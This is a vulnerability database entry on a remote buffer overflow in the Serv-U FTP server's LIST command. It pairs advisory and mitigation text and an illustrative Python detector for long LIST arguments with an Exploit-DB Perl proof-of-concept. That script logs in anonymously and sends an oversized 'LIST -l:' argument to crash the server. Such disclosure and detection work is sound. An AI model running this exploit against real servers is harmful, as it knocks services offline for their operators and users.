Vendor: Serv-U
By:
CVSS: 7.5 HIGH
Remote Buffer Overflow
CWE: 119
Product Name: Serv-U
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:rhino_soft:serv-u
Metasploit:
Other Scripts:
Platforms Tested:

Remote Buffer Overflow in Serv-U

Serv-U is affected by a remote buffer overflow in its handling of the parameter to the FTP LIST command. The vulnerability arises because the application does not properly validate buffer boundaries when processing user input. Successful exploitation can lead to a denial of service condition and may allow an attacker to execute arbitrary code on the affected system with the privileges of the user running the vulnerable application.

Mitigation:

To mitigate this vulnerability, update to the latest version of Serv-U that includes a patch for this issue. Additionally, proper input validation and sanitization of user-supplied data help prevent buffer overflow vulnerabilities.
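
Added example, not part of the original advisory or the Exploit-DB entry: a length check on LIST arguments applied to the FTP control channel, as a sensor or filtering proxy could do in front of an unpatched server. The 100-byte limit, the class and function names, and the sample traffic are assumptions constructed for illustration.

```python
import re

MAX_ARG_LEN = 100    # assumed policy limit, not a value from the advisory
WATCHED = {b"LIST"}  # the advisory names only the LIST command
FILL_RUN = re.compile(rb"(.)\1{31,}", re.DOTALL)  # 32+ repeats of one byte


class FtpCommandInspector:
    """Reassemble client-to-server FTP control data into command lines and
    flag watched commands whose argument exceeds the length limit."""

    def __init__(self, max_arg_len=MAX_ARG_LEN):
        self.max_arg_len = max_arg_len
        self.buf = b""

    def feed(self, chunk):
        """Take one TCP payload; return findings for every completed line."""
        self.buf += chunk
        findings = []
        while b"\n" in self.buf:
            line, self.buf = self.buf.split(b"\n", 1)
            finding = self.inspect(line.rstrip(b"\r"))
            if finding:
                findings.append(finding)
        return findings

    def inspect(self, line):
        verb, _, arg = line.partition(b" ")
        verb = verb.upper()  # FTP command verbs are case-insensitive
        if verb not in WATCHED or len(arg) <= self.max_arg_len:
            return None
        return {
            "verb": verb.decode("ascii"),
            "arg_len": len(arg),
            "repeated_fill": bool(FILL_RUN.search(arg)),
            "prefix": arg[:16].decode("latin-1"),
        }


# Constructed client traffic: a command can straddle two TCP segments.
SAMPLE_CHUNKS = [
    b"USER anonymous\r\nPASS a@b.com\r\n",
    b"LIST -l\r\nlist -l:" + b"A" * 60,
    b"A" * 74 + b"\r\nQUIT\r\n",
]


def scan(chunks):
    inspector = FtpCommandInspector()
    return [f for chunk in chunks for f in inspector.feed(chunk)]
```

This only sees cleartext control channels; where the control connection is encrypted, the same check has to run at the server or at a proxy that terminates TLS.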

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10181/info

Reportedly Serv-U is affected by a remote buffer overflow vulnerability in the list parameter. This issue is due to a failure of the application to properly validate buffer boundaries during processing of user input.

Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system with the privileges of the user that invoked the vulnerable application, although this has not been confirmed.

#!/usr/bin/perl

use IO::Socket;

$host = "www.example.com";

$remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2116",
    );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

$ftp = join("", "LIST -l:", "A" x 134, "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;